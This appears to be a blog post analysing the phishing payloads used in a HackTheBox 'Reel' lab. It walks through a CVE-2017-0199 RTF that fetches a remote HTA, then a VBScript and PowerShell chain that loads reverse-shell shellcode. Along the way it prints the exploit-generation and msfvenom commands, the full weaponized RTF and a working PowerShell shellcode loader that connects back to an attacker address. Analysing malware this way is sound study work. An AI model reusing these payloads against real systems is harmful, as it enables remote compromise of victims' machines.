Malware Analysis: Phishing Docs from HTB Reel
I regularly use tools like msfvenom or scripts from GitHub to create attacks in HackTheBox or PWK. I wanted to take a minute and look under the hood of the phishing documents I generated to gain access to Reel in HTB, to understand what they are doing. By the end, we’ll understand how the RTF abuses a COM object to download and launch a remote HTA. In the HTA, we’ll see layers of script calling each other, until I find some shellcode loaded into memory by PowerShell and run. I’ll do some initial analysis of that shellcode to see the network connection attempts.
Overview
I got a shell on the HackTheBox host Reel by sending a malicious rtf file which was taking advantage of CVE-2017-0199 (check out the Reel write-up for complete details). The attack also makes use of a malicious HTA file. I’ll examine both of these documents to see what they are doing and how they work.
RTF
Generation / Resulting File
I generated the rtf file with the following command using the script on bhdresh’s GitHub:
# python cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.14.3/msfv.hta -t rtf -x 0
The document is actually short enough that I can just show it here:
{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0
{\info
{\author }
{\operator }
}
{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}
{
{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101
{\*\objclass Word.Document.8}
{\*\objdata 0105000002000000
090000004f4c45324c696e6b000000000000000000000a0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d
6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
010000020900000001000000000000000000000000000000a4000000e0c9ea79f9bace118c8200aa004ba90b8c00000068007400740070003a002f002f00310030002e00310030002e00310034002e0033002f006d007300660076002e0068007400610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff0609020000000000c00000000000004600000000ffffffff0000000000000000906660a637b5d201000000000000000000000000000000000000000000000000100203000d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0105000000000000}
{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}
{\*\datastore }
}
RTF Stream Analysis
This isn’t a useful way to do analysis, but also it’s worth being comfortable with an rtf file. It’s just ascii text, with tags and data. In this case, you may have noticed the embedded \objclass Word.Document.8
.
A better tool for rtf analysis is rtfdump.py
from DidierStevens. It shows the various streams in the rtf:
root@kali# rtfdump.py invoice.rtf
1 Level 1 c= 4 p=00000000 l= 5723 h= 5223; 1024 b= 0 u= 46 \rtf1
2 Level 2 c= 2 p=000000b9 l= 31 h= 0; 1 b= 0 u= 0 \info
3 Level 3 c= 0 p=000000c0 l= 9 h= 0; 0 b= 0 u= 0 \author
4 Level 3 c= 0 p=000000cb l= 11 h= 0; 0 b= 0 u= 0 \operator
5 Level 2 c= 1 p=000000da l= 75 h= 16; 4 b= 0 u= 36 \*\xmlnstbl
6 Level 3 c= 0 p=000000e7 l= 61 h= 16; 4 b= 0 u= 36 \xmlns1
7 Level 2 c= 1 p=00000127 l= 5410 h= 5207; 1024 b= 0 u= 10
8 Level 3 c= 3 p=00000129 l= 5407 h= 5207; 1024 b= 0 u= 10 \object
9 Level 4 c= 0 p=00000179 l= 28 h= 5; 1 b= 0 u= 10 \*\objclass Word.Document.8
10 Level 4 c= 0 p=00000197 l= 5234 h= 5202; 1024 b= 0 O u= 0 \*\objdata
Name: 'OLE2Link\x00' Size: 2560 md5: 08b294980ca01cc74840cb1a64af4880 magic: d0cf11e0
11 Level 4 c= 1 p=0000160b l= 60 h= 0; 8 b= 0 u= 0 \result
12 Level 5 c= 0 p=00001614 l= 50 h= 0; 8 b= 0 u= 0 \rtlch
13 Level 2 c= 0 p=0000164b l= 14 h= 0; 0 b= 0 u= 0 \*\datastore
14 Level 0 c= 0 p=0000165c l= 0 h= 0; 0 b= 0 u= 0
rtfdump
has a -f O
option to just show OLE objects:
root@kali# rtfdump.py invoice.rtf -f O
10 Level 4 c= 0 p=00000197 l= 5234 h= 5202; 1024 b= 0 O u= 0 \*\objdata
Name: 'OLE2Link\x00' Size: 2560 md5: 08b294980ca01cc74840cb1a64af4880 magic: d0cf11e0
To look at that stream, I’ll use -s 10
, and -H
to convert the hex to binary:
root@kali# rtfdump.py invoice.rtf -s 10 -H | head
00000000: 01 05 00 00 02 00 00 00 09 00 00 00 4F 4C 45 32 ............OLE2
00000010: 4C 69 6E 6B 00 00 00 00 00 00 00 00 00 00 0A 00 Link............
00000020: 00 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 ................
00000030: 00 00 00 00 00 00 00 00 00 3E 00 03 00 FE FF 09 .........>......
00000040: 00 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ................
00000050: 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 ................
00000060: 00 01 00 00 00 FE FF FF FF 00 00 00 00 00 00 00 ................
00000070: 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000080: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000090: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
At offset 0x21, starts the D0CF11E0, the heading for a Object Linking and Embedding (OLE) Compound File (CF), which is used to store many different file types, including older Office formats (.doc, .xls, .ppt), as well as many other Windows files.
CVE-2017-0199 was widely reported as the OLE2Link bug, and we see that object present here as well.
I’ll dump the OLE steam to a file:
root@kali# rtfdump.py invoice.rtf -s 10 -H -E -d > invoice.rtf.ole
root@kali# file invoice.rtf.ole
invoice.rtf.ole: Composite Document File V2 Document, Cannot read section info
root@kali# wc invoice.rtf.ole
1 7 2560 invoice.rtf.ole
OLE Analysis
Another tool from Didier Stevens, oledump.py
will allow me to look at this file, showing it has three streams:
root@kali# oledump.py invoice.rtf.ole
1: 240 '\x01Ole'
2: 183 '\x03LinkInfo'
3: 6 '\x03ObjInfo'
The first one turns out to be interesting:
root@kali# oledump.py invoice.rtf.ole -s 1
00000000: 01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 A4 00 00 00 E0 C9 EA 79 ...........y
00000020: F9 BA CE 11 8C 82 00 AA 00 4B A9 0B 8C 00 00 00 ...K....
00000030: 68 00 74 00 74 00 70 00 3A 00 2F 00 2F 00 31 00 h.t.t.p.:././.1.
00000040: 30 00 2E 00 31 00 30 00 2E 00 31 00 34 00 2E 00 0...1.0...1.4...
00000050: 33 00 2F 00 6D 00 73 00 66 00 76 00 2E 00 68 00 3./.m.s.f.v...h.
00000060: 74 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 t.a.............
00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000A0: 00 00 00 00 79 58 81 F4 3B 1D 7F 48 AF 2C 82 5D ....yX;.H,]
000000B0: C4 85 27 63 00 00 00 00 A5 AB 00 00 FF FF FF FF ą'c......
000000C0: 06 09 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 ..............F
000000D0: 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 ............
000000E0: 90 66 60 A6 37 B5 D2 01 00 00 00 00 00 00 00 00 f`7.........
Right away, I notice the url I used to build the file (-el
on the strings to look for 16-bit little endian strings):
root@kali# oledump.py invoice.rtf.ole -s 1 -d | strings -el
http://10.10.14.3/msfv.hta
The url comes immediately after this hex string: E0 C9 EA 79 F9 BA CE 11 8C 82 00 AA 00 4B A9 0B
. According to the GUID spec, a GUID is defined as follows:
typedef struct _GUID { DWORD Data1; WORD Data2; WORD Data3; BYTE Data4[8]; } GUID;
Members
Data1
Specifies the first 8 hexadecimal digits of the GUID.
Data2
Specifies the first group of 4 hexadecimal digits.
Data3
Specifies the second group of 4 hexadecimal digits.
Data4
Array of 8 bytes. The first 2 bytes contain the third group of 4 hexadecimal digits. The remaining 6 bytes contain the final 12 hexadecimal digits.
Since the first three are little endian words, the byte order will revsere when translating to a GUID. The last section is a byte array, so the byte order will stay the same. That means E0C9EA79 F9BA CE11 8C8200AA004BA90B converts to {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}
. That CLSID represents URL Moniker, processed by urlmon.dll
. There’s a ton in the Microsoft documentation if you are interested.
Because of how this process will handle the url, it is not necessary that the link point to file ending in .hta
. To have the process handle it as an hta, the file can either have the .hta extension or the webserver respond with a Content-Type: application/hta
header.
HTA
Generation / Resulting File
I created the HTA file using the following msfvenom
command:
# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f hta-psh -o msfv.hta
The result is a simple VB script (with large base64 string replaced with [base64 string]
for readability):
<script language="VBScript">
window.moveTo -4000, -4000
Set cRDBfShauNsm = CreateObject("Wscript.Shell")
Set h8iZy_c = CreateObject("Scripting.FileSystemObject")
For each path in Split(cRDBfShauNsm.ExpandEnvironmentStrings("%PSModulePath%"),";")
If h8iZy_c.FileExists(path + "\..\powershell.exe") Then
cRDBfShauNsm.Run "powershell.exe -nop -w hidden -e [base64 string]",0
Exit For
End If
Next
window.close()
</script>
This script does six things:
- Moves itself off screen.
- Creates a
Wscript.Shell
object. - Creates a
Scripting.FileSystemObject
object. - Uses the
Scripting.FileSystemObject
to verify thatpowershell.exe
is on the host. - Assuming it finds
powershell.exe
, it runs an encoded command. - Closes it’s own window.
Decoding PowerShell
That base64 encoded command decodes to (with spacing added by me and a long, base64 encoded string removed for readability):
if([IntPtr]::Size -eq 4) {
$b='powershell.exe'
} else {
$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'
};
$s=New-Object System.Diagnostics.ProcessStartInfo;
$s.FileName=$b;
$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String([BASE64 STRING REMOVED]))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';
$s.UseShellExecute=$false;
$s.RedirectStandardOutput=$true;
$s.WindowStyle='Hidden';
$s.CreateNoWindow=$true;
$p=[System.Diagnostics.Process]::Start($s);
This basically creates a windowless process that is powershell -nop -w hidden -c [results of decompression / decoding]
.
Decompressing Command
To decompress this command, I’ll need to first base64 decode, then gzip decompress. My first instinct is to do this with the command line:
# echo [base64 string] | base64 -d | gunzip
But I figured I’d take this opportunity to show off another tool: CyberChef. If you’ like GUIs, or just want the ability to play around with chains of operations on data, it’s an awesome tool. It lives on the GCHQ GitHub, and you can also download a copy and run it locally.
To use it, I’ll build a recipe with operations I want to supply (in this case From Base64
and then Gunzip
), give my data as “Input”, and hit “Bake!”:
function oUO {
Param ($fpx, $mPUE0)
$q_L = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $q_L.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-O
bject IntPtr), ($q_L.GetMethod('GetModuleHandle')).Invoke($null, @($fpx)))), $mPUE0))
}
function iIDi2 {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $zJ,
[Parameter(Position = 1)] [Type] $dRbp = [Void]
)
$gRM = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).$
efineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$gRM.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $zJ).SetImplementationFlags('Runtime, Managed')
$gRM.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $dRbp, $zJ).SetImplementationFlags('Runtime, Managed')
return $gRM.CreateType()
}
[Byte[]]$nz = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixL$
jV1oMzIAAGh3czJfVGhMdyYH/9W4kAEAACnEVFBoKYBrAP/VUFBQUEBQQFBo6g/f4P/Vl2oFaAoKDgNoAgABu4nmahBWV2iZpXRh/9WFwHQM/04Idexo8LWiVv/VaGNtZACJ41dXVzH2ahJZVuL9ZsdEJDwBAY1EJBDGAERUUFZWVkZWTlZWU1Zoecw/hv/VieBOVkb/MGgIhx1g/9W78LWiVmimlb2d/9U8B$
wKgPvgdQW7RxNyb2oAU//V")
$md = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oUO kernel32.dll VirtualAlloc), (iIDi2 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $nz.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($nz, 0, $md, $nz.length)
$zw = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oUO kernel32.dll CreateThread), (iIDi2 @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$md,[IntPtr]$
:Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oUO kernel32.dll WaitForSingleObject), (iIDi2 @([IntPtr], [Int32]))).Invoke($zw,0xffffffff) | Out-Null
The part that jumped out to me is that the first function, oUO
looks like it is getting addresses for given functions, and then it’s called at the end to get VirtualAlloc
and CreateThread
. So it’s creating space to write, decoding yet another base64 encoded string and copying it into that space. The return value is $md
, which is passed into creating a thread.
Shellcode Analysis
I dumped the shellcode to a file by just doing echo [base64 string] | base64 -d > shellcode
, and moved it to a Windows host. I opened it with scdbg
, a tool that will run shellcode and show you the API calls it makes. This tool can take all kinds of options, but this case is pretty simple. I’ll pass it /f
with my shellcode file and /s -1
to run unlimited steps:
C:\Users\REM\Desktop>scdbg /f msfv_shell_rev_tcp_shellcode /s -1
Loaded 144 bytes from file msfv_shell_rev_tcp_shellcode
Initialization Complete..
Max Steps: -1
Using base offset: 0x401000
40109b LoadLibraryA(ws2_32)
4010ab WSAStartup(190)
4010ba WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010d4 connect(h=42, host: 10.10.14.3 , port: 443 ) = 71ab4a07
4010d4 connect(h=42, host: 10.10.14.3 , port: 443 ) = 71ab4a07
4010d4 connect(h=42, host: 10.10.14.3 , port: 443 ) = 71ab4a07
4010d4 connect(h=42, host: 10.10.14.3 , port: 443 ) = 71ab4a07
4010d4 connect(h=42, host: 10.10.14.3 , port: 443 ) = 71ab4a07
4010e4 ExitProcess(-1157562366)
Stepcount 2079688
So I see the shellcode opening a socket and connecting back to the host/port that I gave it when I created the hta. scdbg
only emulates these API calls, so I don’t see what happens on a successful connection.
Summary
It’s certainly not too hard to use msfvenom
or scripts from GitHub to create malicious payloads. But it is also worthwhile to open them and and see what they are actually doing. In this case, I have an RTF, which abuses the URL Moniker COM object to request and run a HTA file. The HTA file uses VB script to launch PowerShell, which decompresses and launches some more PowerShell, which loads some shellcode which makes network connections to an IP/port that matches what I gave it when I build the HTA with msfvenom
. I could pull this shellcode into a debugger (x64dbg or Immunity) and allow it to talk back to my Kali box, if I wanted to see more as to what does (and if that’s interesting to you, leave a comment).